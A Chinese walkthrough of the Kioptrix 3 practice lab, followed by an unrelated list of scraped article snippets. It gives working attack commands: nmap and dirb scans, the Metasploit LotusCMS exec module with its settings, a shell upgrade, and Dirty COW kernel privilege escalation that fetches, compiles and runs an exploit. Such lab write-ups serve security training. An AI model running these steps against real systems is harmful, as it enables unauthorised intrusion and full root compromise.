z_hunter

Kioptrix 3

夫学须静也，才须学也；
非学无以广才，非志无以成学

00 环境准备

Kali（IP：10.10.16.128）
Koiptrix 靶机
NAT 网络连接

01 主机发现

nmap -sP 10.10.16.0/24

02 端口扫描

nmap -A -v -sS -sV -p- -T4 10.10.16.153

开放 22（ssh）/ 80（http）端口

03 目录扫描

dirb http://10.10.16.153

得到数据库登录界面 /phpmyadmin

04 漏洞挖掘

根据靶机的描述，在访问靶机的时候先在本地 hosts 文件中添加靶机 IP 和靶机域名的映射。

① 访问目录

② LotusCMS

对于登录界面，常规的弱口令和爆破都没用。但是在用户登录界面看到 LotusCMS ，可以谷歌或者直接去在线漏洞库查找该 CMS 对应的漏洞。
漏洞库1
漏洞库2
发现 LotusCMS 3.0 的版本存在过远程命令执行漏洞，并且收录在 msf 中

05 漏洞利用

① getshell

msfconsole #开启 msf
search lotuscms #查找对应 exploit 模块
use exploit/multi/http/lcms_php_exec #使用该模块
show options #显示需要的参数
info #显示整个 exploit 的信息

这里注意到需要带入参数 RHOSTS 和 URI（默认 /lcms/），由于不存在 /lcms/ 目录，所以默认使用的话该 exploit 会不起作用，不能反弹 shell

set rhosts 10.10.16.153
set uri /
exploit
shell #获取原生 shell
python -c 'import pty;pty.spawn("/bin/bash")' #获取完全交互式 shell

② 提权

得到 shell 之后就剩提权了，使用 ==uname -a == 得到当前靶机系统内核版本，这里使用 Linux 提权辅助工具 Linux-exploit-suggester 对靶机内核进行漏洞搜索。

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh #下载 linux-exploit-suggester
./linux-exploit-suggester.sh -k 2.6.24 # 搜索内核 2.6.24 版本的漏洞

在 Kali 中下载 dirtycow 2 (Download URL) 到 /tmp 目录下，开启 HTTP 服务供靶机下载脚本。

wget https://www.exploit-db.com/download/40839
python -m SimpleHTTPServer 80

靶机下载脚本之后查看，发现使用了该脚本攻击之后，默认的管理员账号是 firefart，编译脚本的方法，还可以修改管理员密码，提权的方式等等。

wget http://10.10.16.153/40839
cat 40839 #查看脚本信息

在编译这里遇到一个问题，在前面下载脚本的时候文件名 48039 ，是一个 C 文件，但是没指定后缀名，导致 GCC 编译器编译的时候出错。

mv 40839 dirty.c #修改文件名
gcc -pthread dirty.c -o dirty -lcrypt

运行文件并提权。

./dirty 
su firefart #提权

③ flag

flag 在 /root/Congrats.txt 中。

06 后续

本次 getshell 到提权利用的是 lotusCMS 的漏洞和内核的版本的漏洞，前面目录扫描得到的许多信息也存在着漏洞，同样也可作为切入点 getshell ，下一次记录时再续吧。

                                                                                                                                                                     猪头
                                                                                                                                                                  2020.3.17

你可能感兴趣的:(OSCP)

ROS常用命令火山大兄 ROS 机器人
一、ROS1、ROSShell命令roscd-移动到指定的ROS功能包目录rosls-显示ROS功能包的文件与目录rosed-编辑ROS功能包的文件roscp-复制ROS功能包的文件rospd-添加目录至ROS目录索引rosd-显示ROS目录索引中的目录具体使用（只介绍常见使用）：roscd[功能包名称]。使用它，无需再使用cd一层层到查找，进入功能包里rosls[功能包名称]。等价与roscd+
Action通信学习记录（一）看不懂文献小天才学习 python 笔记
1.action通信自定义action文件action、srv、msg文件内的可用数据类型一致，且三者实现流程类似:按照固定格式创建action文件；编辑配置文件；编译生成中间文件。1.定义action文件首先新建功能包，并导入依赖:roscpprospystd_msgsactionlibactionlib_msgs；然后功能包下新建action目录，新增Xxx.action(比如:AddInts
用C++编写一个简单的Publisher和Subscriber 网路元素
1.创建PublisherNoderoscdbeginner_tutorials创建src/talker.cpp文件，内容如下（可从https://raw.github.com/ros/ros_tutorials/kinetic-devel/roscpp_tutorials/talker/talker.cpp获取源码）：#include"ros/ros.h"#include"std_msgs/St
OSCP vulhub LORD OF THE ROOT: 1.0.1 GuiltyFet OSCP linux 服务器 ubuntu
vulhubLORDOFTHEROOT:1.0.1靶场信息&安装Description一、信息收集第一种ssh爆破第二种猜二、漏洞探测三、漏洞利用四、提权第二种方法：udf提权第三种缓冲区溢出提权靶场信息&安装地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129/发布日期：2015年9月23日目标：得到root权限Description
VulnHub-Lord Of The Root_1.0.1-靶机渗透学习嗯嗯呐 linux mysql 运维 base64 ubuntu
靶机地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129/靶机难度：中等（CTF）靶机描述：这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念。目标：得到root权限&找到flag.txt作者：嗯嗯呐一、信息采集nmap扫描确定靶机IP地址扫描
No.6-VulnHub-Lord Of The Root: 1.0.1-Walkthrough渗透学习大余xiyou linux python 数据库安全
**VulnHub-LordOfTheRoot:1.0.1-Walkthrough**靶机地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129/靶机难度：中等（CTF）靶机发布日期：2015年9月23日靶机描述：这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电
OSCP 靶场 - Vault 安鸾彭于晏哈希算法算法
端口扫描nmapnmap-O192.168.162.172smb枚举smbmap(kali自带)//枚举GUEST用户可以使用的目录smbmap-uGUEST-H192.168.162.172NTLMrelay—smbrelay1.制作钓鱼文件使用https://github.com/xct/hashgrabpython3hashgrab.py192.168.45.212test2.上传钓鱼文件使
LINUX上新建用户无法进入hbase进行操作 2020-08-26 1edee8a22fc9
1.在LINUX上新建用户coscp用户，coscp用户没有权限，进入hbase进行操作，调用脚本在hbase上新建表，会提示没有权限解决方法给用户授权：grant'coscp','RWXCA'2．使用coscp用户hbase进行操作的时候，会提示未认证“FATALipc.RpcClientImpl:SASLauthenticationfailed.Themostlikelycauseismiss
误操作卸载audit-libs 导致共享库 libaudit.so.1文件丢失千里不留行_ linux 服务器运维
问题：误操作卸载audit-libs导致共享库libaudit.so.1文件丢失，sudoscp等外部命令不能使用解决办法：想办法把包上传到linux中（这里我是放到/root/）重启服务器（1）按e进入单用户模式（2）linux16最后面加入init=/bin/bash(3)按ctrl+x(4)mount-oremount,rw/#重新挂载根目录赋予读写权限(5)vim/etc/selinux/
oscp_靶场练习_Brainfuck 0rch1d hack the box 渗透测试信息搜集网络安全
oscp_靶场练习_Brainfuck1.nmap扫描端口扫描：┌──(root㉿kali)-[~/Downloads]└─#nmap10.10.10.17-PnStartingNmap7.92(https://nmap.org)at2023-02-2106:19ESTNmapscanreportfor10.10.10.17Hostisup(0.23slatency).Notshown:995fi
oscp_靶场练习_Lame 0rch1d hack the box 渗透测试网络安全
oscp_靶场练习_Lame1.nmap扫描：└─#nmap10.10.10.3StartingNmap7.92(https://nmap.org)at2023-02-2023:21ESTNmapscanreportfor10.10.10.3Hostisup(0.22slatency).Notshown:996filteredtcpports(no-response)PORTSTATESERVIC
Roscpp中构造函数与析构函数及在无人机串口通信应用 LENG_Lingliang Linux/ROS/无人机无人机 c++
1.概念辨析构造函数作用：初始化，在创建对象时会自动调用，有点像Python中的__init__方法特点：命名为class命名，在public中声明。析构函数作用：完成释放前的一些清理工作。特点：命名为~+class命名，在public中声明。调用顺序栈的顺序，先构造的后析构。2.编写示例ROScpp中在include文件夹下的.h头文件中声明class类别。以一个无人机串口通信代码为例：clas
靶场实战(11)：OSCP备考之VulnHub Insanity 1 OneMoreThink 安全网络
靶场思路主机发现端口发现（服务、组件、版本）漏洞发现（获取权限）21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞（目录、文件）提升权限elliot用户sudosuidcron内核提权信息收集一、主机发现本次靶场是Insanity:1[1]，指定目标IP，不涉及主机发现过程。二、端口发现（服务、组件、版本）使用命令sudo-urootn
靶场实战(12)：OSCP备考之VulnHub SEPPUKU OneMoreThink 安全网络服务器 web安全运维
打靶思路资产发现主机发现服务发现（端口、服务、组件、版本）漏洞发现（获取权限）21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞（目录、文件）7080端口/HTTPS服务组件漏洞URL漏洞（目录、文件）7601端口/HTTP服务组件漏洞URL漏洞（目录、文件）提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提
靶机实战(5)：OSCP备考之VulnHub SUNSET DECOY OneMoreThink 网络安全服务器运维
靶机官网：SUNSET:DECOY[1]实战思路：主机发现端口发现（服务、组件、版本）1漏洞发现（获取权限）222端口/SSH服务2组件漏洞2口令漏洞280端口/HTTP服务2组件漏洞2URL漏洞（目录、文件）3越权提权601、sudo602、suid03、信息收集704、tty905、sudo906、suid07、信息收集1108、chkrootkit一、主机发现本次攻击指定IP，不涉及主机发现
靶场实战(7)：OSCP备考之VulnHub Potato 1 OneMoreThink 安全 web安全网络
靶机官网：Potato:1[1]实战思路：主机发现端口发现（服务、组件、版本）漏洞发现（获取权限）2112端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞1（目录、文件）URL漏洞2（目录、文件）22端口/SSH服务组件漏洞口令漏洞提升权限01、suid02、cron03、sudo一、主机发现本次攻击指定IP，不涉及主机发现过程。二、端口发现（服务、组件、版本）使用命令su
靶场实战(13)：OSCP备考之VulnHub GAARA OneMoreThink 网络服务器安全 tcp/ip 运维
打靶思路资产发现主机发现服务发现漏洞发现（获取权限）80端口/HTTP服务组件漏洞URL漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务22端口/SSH服务提升权限gaara用户sudosuid1、资产发现1.1、主机发现本次靶机GAARA[1]指定攻击IP，不涉及主机发现过程。1.2、服务发现使用命令sudo-uroot172.16.33.69-n-Pn-p---reason-sV
靶机实战(9)：OSCP备考之VulnHub BTRSys v2.1 OneMoreThink 安全网络
靶机官网：BTRSys:v2.1[1]实战思路：一、主机发现二、端口发现（服务、组件、版本）三、漏洞发现（获取权限）21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞（目录、文件）四、提升权限www-data用户sudosuidcron内核提权信息收集btrisk用户sudo一、主机发现本次攻击指定IP，不涉及主机发现过程。二、端口发现
OSCP 靶场 - Vault 安鸾彭于晏 web安全安全网络
端口扫描nmapnmap-O192.168.162.172smb枚举smbmap(kali自带)//枚举GUEST用户可以使用的目录smbmap-uGUEST-H192.168.162.172NTLMrelay—smbrelay1.制作钓鱼文件使用GitHub-xct/hashgrab:generatepayloadsthatforceauthenticationagainstanattacker
靶机实战(10)：OSCP备考之VulnHub Tre 1 OneMoreThink
靶机官网：Tre:1[1]实战思路：一、主机发现二、端口发现（服务、组件、版本）三、漏洞发现（获取权限）8082端口/HTTP服务组件漏洞URL漏洞（目录、文件）80端口/HTTP服务组件漏洞URL漏洞（目录、文件）22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务URL漏洞（目录、文件）四、提升权限tre用户sudosuidcron后记一、主机发现本次攻击指定IP，不涉及主机发现过程。二
GPM合并资料整理-GEM部分酷爽 iOS cocoa macos objective-c
一、性能数据上报项1.CPU模块上报键值说明采集平台cpu当前进程cpu使用率平均值Android&iOStotcpu系统cpu总使用率平均值Android&iOScpu_temp_maxcpu最高温度Androidcpu_temp_avgcpu温度平均值Androidgpu_temp_avggpu温度平均值Androidgpu_temp_maxgpu最高温度Androidgpugpu使用率平均值
vulnhub7 清风-- web安全安全
靶机地址：https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova这次的靶机风格比较偏向OSCP风格，区别于传统的CTF类型的靶机，只需要提权到root即可，而且这次打靶确实触碰到很多知识盲区了提示：本地不需要任何暴力破解的地方，而且每个点都会有响应的提示信息收集老传统nmap信息收集了：扫描端口：┌──(kali㉿kali)-[~/
ROS学习笔记（9）进一步深入了解ROS第三步星影沉璧 ROS学习学习笔记
0.前提1.(C++)Whydidyouincludetheheaderfileofthemessagefileinsteadofthemessagefileitself?（为包含消息的头文件而不是消息本身？）回答：msg文件是描述ROS消息字段的文本文件，用于生成不同语言消息的源代码。按官方给的描述，我理解为在编译时要将文本文件转换成源代码，在将他包含进rospy或者roscpp，而直接包含消息
安装mac os 未能与服务器取得联系,Apple服务器问题导致应用程序安装与macOS更新失败等问题... weixin_39640444 安装mac os 未能与服务器取得联系
在星期四的几个小时中，Apple证书检查功能出现问题，导致应用程序在启动时挂起，并且在macOSBigSur更新失败中占了很大一部分。开发商JeffJohnson表示，当尝试连接到Apple的在线证书状态协议网站(oscp.apple.com)时，具体地说，称为“受信任”的过程失败。大量报告表明应用程序性能不佳，其中一些人认为升级到macOSBigSur的用户迷是罪魁祸首。Johnson体验了ma
rosrun/ros2 run命令 geniusNMRobot ros2 ros
rosrunrosrunallowsyoutorunanexecutableinanarbitrarypackagewithouthavingtocd(orroscd)therefirst.这个命令最开始的用途是：不用输入包的地址就可以启动那个包内的可执行文件。比较记忆地址还是要Usage:rosrunpackageexecutableExample:rosrunroscpp_tutorialst
2018 ACM-ICPC Syrian Collegiate Programming Contest（部分题解，待补） Mitsuha_ 思维计算几何状压DP ACM-ICPC
传送门2018ACM-ICPC叙利亚大学生程序设计竞赛ProblemA：HelloSCPC2018!签到题ProblemB：BinaryHamming简单题#includeusingnamespacestd;constintMAX=1e6+10;constintINF=1e9+7;typedeflonglongll;chara[200],b[200];intmain(){freopen("hamm
如何将一个cpp文件放入到已有ROS工作空间中编译通过以及如何调用第三方库 lanhuazhiyue vscode
如何将一个cpp文件放入到已有ROS工作空间中编译通过以及如何调用第三方库1.创建一个新的功能包catkin_create_pkg自定义ROS包名roscpprospystd_msgs2.helloworld在src中添加你的cpp文件，并放开cmakelist.txt里关于add_executable()和target_link_libraries()的注释，修改名字为你的cpp文件名（add_
机械臂仿真程序记录贴(2) drivenzyw ubuntu
一、新建功能包catkin_create_pkgmotion_planningrospyroscppstd_msgs二、vscode打开code./三、新建cpp文件来规划路径(看官方文档吧)MoveGroupC++Interface—moveit_tutorialsMelodicdocumentation这个是c++版本的↑，主要看他给你推的那个参考包里面有不同的demo，仿照它写就好
iOS将framework转为xcframework 培根芝士 iOS ios
拆分framework先把framework拷贝到两个文件夹下边，这里只需要armv7、arm64、x86_64。mkdiriphoneosiphonesimulatorcp-Rmysdk.frameworkiphoneoscp-Rmysdk.frameworkiphonesimulator把iphoneos中的模拟器指令集删除lipo-removei386-removex86_64iphoneo
注册中心 go_2021
百发失一，不足谓善射；千里蹞步不至，不足谓善御；伦类不通，仁义不一，不足谓善学。学也者，固学一之也。一出焉，一入焉，涂巷之人也；其善者少，不善者多，桀纣盗跖也；全之尽之，然后学者也。常用的注册中心对比name协议语言zkcp（zab）eurekaapjavanacoscp&&apjavaetcdcp(raft)goconsulcp(raft)gohttps://mp.weixin.qq.com/s
二分查找排序算法周凡杨 java 二分查找排序算法折半
一：概念二分查找又称折半查找（折半搜索/ 二分搜索），优点是比较次数少，查找速度快，平均性能好；其缺点是要求待查表为有序表，且插入删除困难。因此，折半查找方法适用于不经常变动而查找频繁的有序列表。首先，假设表中元素是按升序排列，将表中间位置记录的关键字与查找关键字比较，如果两者相等，则查找成功；否则利用中间位置记录将表分成前、后两个子表，如果中间位置记录的关键字大于查找关键字，则进一步
java中的BigDecimal bijian1013 java BigDecimal
在项目开发过程中出现精度丢失问题，查资料用BigDecimal解决，并发现如下这篇BigDecimal的解决问题的思路和方法很值得学习，特转载。原文地址：http://blog.csdn.net/ugg/article/de
Shell echo命令详解 daizj echo shell
Shell echo命令 Shell 的 echo 指令与 PHP 的 echo 指令类似，都是用于字符串的输出。命令格式： echo string 您可以使用echo实现更复杂的输出格式控制。 1.显示普通字符串: echo "It is a test" 这里的双引号完全可以省略，以下命令与上面实例效果一致： echo Itis a test 2.显示转义
Oracle DBA 简单操作周凡杨 oracle dba sql
--执行次数多的SQL select sql_text,executions from ( select sql_text,executions from v$sqlarea order by executions desc ) where rownum<81; &nb
画图重绘朱辉辉33 游戏
我第一次接触重绘是编写五子棋小游戏的时候，因为游戏里的棋盘是用线绘制的，而这些东西并不在系统自带的重绘里，所以在移动窗体时，棋盘并不会重绘出来。所以我们要重写系统的重绘方法。在重写系统重绘方法时，我们要注意一定要调用父类的重绘方法，即加上super.paint(g)，因为如果不调用父类的重绘方式，重写后会把父类的重绘覆盖掉，而父类的重绘方法是绘制画布，这样就导致我们
线程之初体验西蜀石兰线程
一直觉得多线程是学Java的一个分水岭，懂多线程才算入门。之前看《编程思想》的多线程章节，看的云里雾里，知道线程类有哪几个方法，却依旧不知道线程到底是什么？书上都写线程是进程的模块，共享线程的资源，可是这跟多线程编程有毛线的关系，呜呜。。。线程其实也是用户自定义的任务，不要过多的强调线程的属性，而忽略了线程最基本的属性。你可以在线程类的run()方法中定义自己的任务，就跟正常的Ja
linux集群互相免登陆配置林鹤霄 linux
配置ssh免登陆 1、生成秘钥和公钥 ssh-keygen -t rsa 2、提示让你输入，什么都不输，三次回车之后会在~下面的.ssh文件夹中多出两个文件id_rsa 和 id_rsa.pub 其中id_rsa为秘钥，id_rsa.pub为公钥，使用公钥加密的数据只有私钥才能对这些数据解密 c
mysql : Lock wait timeout exceeded; try restarting transaction aigo mysql
原文：http://www.cnblogs.com/freeliver54/archive/2010/09/30/1839042.html 原因是你使用的InnoDB 表类型的时候, 默认参数:innodb_lock_wait_timeout设置锁等待的时间是50s, 因为有的锁等待超过了这个时间,所以抱错. 你可以把这个时间加长,或者优化存储
Socket编程基本的聊天实现。 alleni123 socket
public class Server { //用来存储所有连接上来的客户 private List<ServerThread> clients; public static void main(String[] args) { Server s = new Server(); s.startServer(9988); } publi
多线程监听器事件模式(一个简单的例子) 百合不是茶线程监听模式
多线程的事件监听器模式监听器时间模式经常与多线程使用,在多线程中如何知道我的线程正在执行那什么内容,可以通过时间监听器模式得到创建多线程的事件监听器模式思路: 1, 创建线程并启动,在创建线程的位置设置一个标记 2,创建队
spring InitializingBean接口 bijian1013 java spring
spring的事务的TransactionTemplate，其源码如下： public class TransactionTemplate extends DefaultTransactionDefinition implements TransactionOperations, InitializingBean{ ... } TransactionTemplate继承了DefaultT
Oracle中询表的权限被授予给了哪些用户 bijian1013 oracle 数据库权限
Oracle查询表将权限赋给了哪些用户的SQL，以备查用。 select t.table_name as "表名", t.grantee as "被授权的属组", t.owner as "对象所在的属组"
【Struts2五】Struts2 参数传值 bit1129 struts2
Struts2中参数传值的3种情况 1.请求参数绑定到Action的实例字段上 2.Action将值传递到转发的视图上 3.Action将值传递到重定向的视图上一、请求参数绑定到Action的实例字段上以及Action将值传递到转发的视图上 Struts可以自动将请求URL中的请求参数或者表单提交的参数绑定到Action定义的实例字段上，绑定的规则使用ognl表达式语言
【Kafka十四】关于auto.offset.reset[Q/A] bit1129 kafka
I got serveral questions about auto.offset.reset. This configuration parameter governs how consumer read the message from Kafka when there is no initial offset in ZooKeeper or
nginx gzip压缩配置 ronin47 nginx gzip 压缩范例
nginx gzip压缩配置更多 0 nginx gzip 配置随着nginx的发展，越来越多的网站使用nginx，因此nginx的优化变得越来越重要，今天我们来看看nginx的gzip压缩到底是怎么压缩的呢？ gzip(GNU-ZIP)是一种压缩技术。经过gzip压缩后页面大小可以变为原来的30%甚至更小，这样，用
java-13.输入一个单向链表，输出该链表中倒数第 k 个节点 bylijinnan java
two cursors. Make the first cursor go K steps first. /* * 第 13 题：题目：输入一个单向链表，输出该链表中倒数第 k 个节点 */ public void displayKthItemsBackWard(ListNode head,int k){ ListNode p1=head,p2=head;
Spring源码学习-JdbcTemplate queryForObject bylijinnan java spring
JdbcTemplate中有两个可能会混淆的queryForObject方法： 1. Object queryForObject(String sql, Object[] args, Class requiredType) 2. Object queryForObject(String sql, Object[] args, RowMapper rowMapper) 第1个方法是只查
[冰川时代]在冰川时代,我们需要什么样的技术? comsci 技术
看美国那边的气候情况....我有个感觉...是不是要进入小冰期了? 那么在小冰期里面...我们的户外活动肯定会出现很多问题...在室内呆着的情况会非常多...怎么在室内呆着而不发闷...怎么用最低的电力保证室内的温度.....这都需要技术手段... &nb
js 获取浏览器型号 cuityang js 浏览器
根据浏览器获取iphone和apk的下载地址 <!DOCTYPE html> <html> <head> <meta charset="utf-8" content="text/html"/> <meta name=
C# socks5详解转 dalan_123 socket C#
http://www.cnblogs.com/zhujiechang/archive/2008/10/21/1316308.html 这里主要讲的是用.NET实现基于Socket5下面的代理协议进行客户端的通讯，Socket4的实现是类似的，注意的事，这里不是讲用C#实现一个代理服务器，因为实现一个代理服务器需要实现很多协议，头大，而且现在市面上有很多现成的代理服务器用，性能又好，
运维 Centos问题汇总 dcj3sjt126com 云主机
一、sh 脚本不执行的原因 sh脚本不执行的原因只有2个 1.权限不够 2.sh脚本里路径没写完整。二、解决You have new mail in /var/spool/mail/root 修改/usr/share/logwatch/default.conf/logwatch.conf配置文件 MailTo = MailFrom 三、查询连接数
Yii防注入攻击笔记 dcj3sjt126com sql WEB安全 yii
网站表单有注入漏洞须对所有用户输入的内容进行个过滤和检查，可以使用正则表达式或者直接输入字符判断，大部分是只允许输入字母和数字的，其它字符度不允许；对于内容复杂表单的内容，应该对html和script的符号进行转义替换：尤其是<,>,',"",&这几个符号这里有个转义对照表： http://blog.csdn.net/xinzhu1990/articl
MongoDB简介[一] eksliang mongodb MongoDB简介
MongoDB简介转载请出自出处：http://eksliang.iteye.com/blog/2173288 1.1易于使用 MongoDB是一个面向文档的数据库，而不是关系型数据库。与关系型数据库相比，面向文档的数据库不再有行的概念，取而代之的是更为灵活的“文档”模型。另外，不
zookeeper windows 入门安装和测试 greemranqq zookeeper 安装分布式
一、序言以下是我对zookeeper 的一些理解： zookeeper 作为一个服务注册信息存储的管理工具，好吧，这样说得很抽象，我们举个“栗子”。栗子1号：假设我是一家KTV的老板，我同时拥有5家KTV，我肯定得时刻监视
Spring之使用事务缘由(2-注解实现) ihuning spring
Spring事务注解实现 1. 依赖包： 1.1 spring包： spring-beans-4.0.0.RELEASE.jar spring-context-4.0.0.
iOS App Launch Option 啸笑天 option
iOS 程序启动时总会调用application:didFinishLaunchingWithOptions:，其中第二个参数launchOptions为NSDictionary类型的对象，里面存储有此程序启动的原因。 launchOptions中的可能键值见UIApplication Class Reference的Launch Options Keys节。 1、若用户直接
jdk与jre的区别（_） macroli java jvm jdk
简单的说JDK是面向开发人员使用的SDK，它提供了Java的开发环境和运行环境。SDK是Software Development Kit 一般指软件开发包，可以包括函数库、编译程序等。 JDK就是Java Development Kit JRE是Java Runtime Enviroment是指Java的运行环境，是面向Java程序的使用者，而不是开发者。如果安装了JDK，会发同你
Updates were rejected because the tip of your current branch is behind qiaolevip 学习永无止境每天进步一点点众观千象 git
$ git push joe prod-2295-1 To [email protected]:joe.le/dr-frontend.git ! [rejected] prod-2295-1 -> prod-2295-1 (non-fast-forward) error: failed to push some refs to '[email protected]
[一起学Hive]之十四-Hive的元数据表结构详解 superlxw1234 hive hive元数据结构
关键字：Hive元数据、Hive元数据表结构之前在 “[一起学Hive]之一–Hive概述，Hive是什么”中介绍过，Hive自己维护了一套元数据，用户通过HQL查询时候，Hive首先需要结合元数据，将HQL翻译成MapReduce去执行。本文介绍一下Hive元数据中重要的一些表结构及用途，以Hive0.13为例。文章最后面，会以一个示例来全面了解一下，
Spring 3.2.14，4.1.7，4.2.RC2发布 wiselyman Spring 3
Spring 3.2.14、4.1.7及4.2.RC2于6月30日发布。其中Spring 3.2.1是一个维护版本(维护周期到2016-12-31截止)，后续会继续根据需求和bug发布维护版本。此时，Spring官方强烈建议升级Spring框架至4.1.7 或者将要发布的4.2 。其中Spring 4.1.7主要包含这些更新内容。

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他